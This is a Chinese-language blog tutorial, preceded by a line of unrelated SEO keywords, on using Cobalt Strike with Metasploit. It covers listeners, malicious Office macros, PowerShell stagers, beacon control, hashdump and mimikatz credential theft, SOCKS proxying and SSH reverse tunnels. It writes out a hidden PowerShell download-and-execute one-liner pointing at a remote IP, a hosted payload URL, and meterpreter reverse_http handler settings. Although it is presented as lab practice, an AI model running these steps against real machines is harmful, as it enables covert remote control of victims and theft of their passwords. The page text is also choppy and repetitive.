做网站怎么调用栏目,网站备案的核验单,营销网站和展示型网站,做网站包括什么软件一、快捷工具栏 3、需要创建监听器#xff0c;才能让靶机上线#xff0c;连接我们公网服务端上去开启的帧监听端口#xff0c;做任何操作
都是通过服务器的IP地址去连接靶机#xff0c;去和靶机进行文件stage的一个传输和交互。这里推荐把cs
放到公网上边#xff0c;比较…一、快捷工具栏 3、需要创建监听器才能让靶机上线连接我们公网服务端上去开启的帧监听端口做任何操作
都是通过服务器的IP地址去连接靶机去和靶机进行文件stage的一个传输和交互。这里推荐把cs
放到公网上边比较方便让靶机上线。
4-6单个视图
11、payload分为stage和stageless(相当于php大马拥有所有的功能包括meterpreter,很大不
需其他的管理器就能实现完全的交互网络环境比较差的时候可以使用它大并且容易查杀)
12、已淘汰
13、生成恶意Office宏攻击嵌入恶意宏攻击。
14、建立web_delivery是在内存上执行恶意代码不会再服务器上留下文件的。 查看进程ps aux | grep teamserver
kali -9 进程 干掉进程
sudo yum install java-11-openjdk-devel(cs4.3版本java11环境)
sudo yum list installed | grep java查看已安装java
sudo alternatives --config java 切换环境
java -version查看版本
export JAVA_HOME$(dirname $(dirname $(readlink -f $(which java))))
echo $JAVA_HOME 设置环境变量此两条命令直接在命令行执行
sudo lsof -i :50050 查看端口状态 ./msg 用户名 信息发送给指定用户 二、创建监听器listener
点击Cobalt strike——监听器——add 获取靶机上线stager任何靶机上线都是通过服务端 查看端口是否在线 netstat -ano |grep 8080
三、学习cobaltrike实战演示1
创建完监听器后想让靶机上线那就攻击靶机 云服务器用作实验的话如果安全组不需要特定要求直接放通全部 靶机上线操作 选择前边设置的监听器和方法这里的方法我是用的是powershell
选择文件保存位置这里我保存到桌面为了方便这个是windows10做的客户端 之后需要再开启一个端口让靶机可以下载这个文件使用web-drive-by的host file选择刚刚生
成的文件 复制下边内容 http://39.99.136.38:9090/download/file.ext
在靶机里边执行 这使用的是windows7 64位操作系统 此时靶机已上线 上线之后可以靶机进行一系列的控制 这里是默认60秒的心跳间隔真实环境可以不修改容易被ids查杀
①设置时间间隔 ②在beacon中 sleep 2亦可以设置 靶机想要下线就把进程process关掉在这个界面退出会再次上线 shell ipconfig 命令 help 可以查看我们能执行的一些命令 重要模块 ②转移③内存中获取密码④不建议开启vps带宽较小很卡
screenshot截屏
在视图界面可以查看 亦可以端口扫描和查看进程
四、学习cobaltrike实战演示2 其他的监听器和attack进行一个主机上线如下 设置端口监听器同样如上执行可以上线
删除我们开启的东西
①mamager web server
②attacks ——web-driver-by ——manager 这如果在设置的时候没有copy,这里也是可以copy的
想关掉直接选中点击kill
端口扫描完可做如下操作三个视图模式 脚本可以github搜选择一个路径导入cna成功会显示ready√
五、学习cobaltrike攻击流程 拿root和system权限 选择监听器和利用脚本 自动打出去 两个用户是不一样的 ①hashdump命令或者②右击——执行——hash读取用户哈希值或者③右键run mimikatzs 此时在任务管理器运行着powwershell.exe把它杀死了就没了可以利用msf做进程迁移
先右击exit和remove把靶机移除掉新操作因为直接remove会在自动上线 比较安全 powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(http://35.12.32.156:9091/a))复制此代码到靶机去执行
此处是dvwa靶场 此时靶机又上线了 靶机上线方法
①命令执行②文件上传上传webshell(工具执行连接)无报错有权限执行靶机即可上线如果
cs是在内网中的确定靶机能够连到cs
六、学习cs和msf联动
1、cs联动msf之socks代理访问内网或者无法直接访问的服务器就需要建立代理
2、cs联动msf之外部监听器
3、练习
1、介绍
cobalt strike(简称CS)及Metasploit(简称msf)各有所长cs更适合作为稳控平台msf更适用于与各
类内网信息搜集及漏洞利用。为了取各家之所长我们进行联动。 meterpreter的功能十分强大模块非常多攻击辅助编码等等cs进行团队合作进行主机
的上线和smb的横向移动内网管控平台
环境搭建条件
①cs客户端一台windows10操作系统一台centos7操作系统或者kali操作系统也行
②一台云服务器作为cs服务器公网上vps
③一台windows7(可联网)一台windows2012不联网
操作步骤
①socks 端口如 socks 1234 可以在vps查看netstat -ano|grep 1234是否是监听状态
如何连接代理代理是对服务端的客户端只是连接服务器所有的操作都是在服务端即vps操作
的 复制上述命令转到msf中执行 此时整个msf就被代理到了1234端口此时进行辅助端口扫描 非常慢
kali中操作 在文件中写入如下内容保存 此时还ping不了ping在tcp/ip上一层icmp不能对ping代理转发namp可以进行no ping 扫
描 此时会很慢因为走代理
虚拟机——物理网卡——运营商交换机——路由——vps服务器此时就可扫描重要端口不全
扫 结果如下 2、学习cs联动msf之外部监听器 ①创建一个新的linstener 转移时会开 把system的sesion发给metetpreter
kali中 将cs服务器的session发送到cs客户端也就是meterpreter(kali这一端)
外网ping不通内网即cs服务器无法通cs客户端做代理转发 保存退出 重启生效有隧道转发功能 执行此命令就可代理转发 此时内网的8085端口和vps的8085端口就通了去看拓扑图
选择上线的主机——右键span转移——选择监听器——外部的http8085 拿到meterpreter
3、实操操作步骤
这里是提权一下后的ssystem权限的用户
①在vps中 vi /etc/ssh/sshd_configsshd_config是服务端配置文件 ②AllowTcpForwarding yes
GatewayPorts yes
TCPKeepAlive yes
PasswordAuthentication yes
③systemctl restart sshd.service或者systemctl restart sshd(这样才有隧道转发的功能)
④回到本地的 kali 中通过 ssh 隧道做转发
创建ssh隧道常用的参数:
-C:压缩传输提供传输速度
-f :将ssh传输转入后台执行不占用当前的shell
-N:建立静默连接(建立了连接但是看不到具体会话)
-g:允许远程主机连接本地用于转发的端口
-L:本地端口转发
-R:远程端口转发
-D:动态转发
-P指定ssh端口
⑤命令执行ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root119.xx.xx.xx -p 22
含义解释通过 119.xx.xx.xx 机器把外部的 8085 端口上的流量转到本地192.168.129.139 的 8085
端口上而本地的 8085 端口上跑的又的监听器所以最终才造成 meterpreter本地上线的效
果。
⑥netstat -anltup 查看正在工作的端口 ⑦netstat -tulnp |grep 8085查看服务器是否开启8085端口
此处有错误可以查杀pid kill pid即可ssh
⑧创建一个新的监听器 ⑨在kali中启用msfconsole设置参数
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.129.139
set lport 9999
show options
run
⑩ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root119.xx.xx.xx -p 22 最好检查一下是否设置成功netstat -anltup没有问题做如下操作 等待stage发送 此时拿到了meterpreter这个不知道是抽了什么风重启虚拟机之后我搞了两次才出来多次
尝试比较卡此时可以拿shell如果显示乱码 chcp 65001,进程迁移,exit退出
一、快捷工具栏
二、创建监听器listener
三、学习cobaltrike实战演示1
四、学习cobaltrike实战演示2
五、学习cobaltrike攻击流程
六、学习cs和msf联动
1、介绍
2、学习cs联动msf之外部监听器
3、实操操作步骤